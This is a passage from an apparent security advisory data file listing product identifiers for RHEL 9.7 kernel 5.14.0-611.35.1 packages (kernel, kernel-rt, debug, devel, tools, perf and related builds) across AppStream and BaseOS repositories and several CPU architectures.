"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"BaseOS-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"BaseOS-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
